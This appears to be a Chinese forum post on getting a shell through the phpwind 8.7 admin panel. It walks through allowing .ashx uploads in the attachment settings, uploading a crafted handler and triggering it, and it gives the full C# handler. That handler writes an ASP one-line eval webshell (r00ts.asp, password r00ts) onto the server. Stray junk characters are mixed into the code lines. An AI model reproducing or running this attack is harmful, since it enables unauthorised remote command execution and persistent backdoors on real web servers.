phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
4 V, y' {  ?3 J9 B: M9 e) M
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:

( L0 X8 J3 O9 ]( h) m, z& |<%@ WebHandler Language="C#"Class="Handler" %>
4 }) j1 x9 _* i0 @: Zusing System;
1 p8 ]  x* i5 ~5 G+ Ausing System.Web;
" j9 q7 z% D8 h5 v4 @using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
& a, M+ J3 a1 T4 B3 `( ]2 Acontext.Response.ContentType = "text/plain";
; d  \% S3 \! m! d! O, C% OStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
# q) T8 v3 c# m1 V3 M7 K, Zfile1.Write("<%eval request(\"r00ts\")%>");
% H* r0 ]( J6 i) x% m  W- P/ M5 Jfile1.Flush();
file1.Close();
}
6 _  j+ [0 n2 Z  E/ x# _public bool IsReusable {
get {
7 }' H# w: I3 C; l* @; ireturn false;
}
; z' @' o1 h: ]$ }}
}
* U, \# o; w% }4 t  c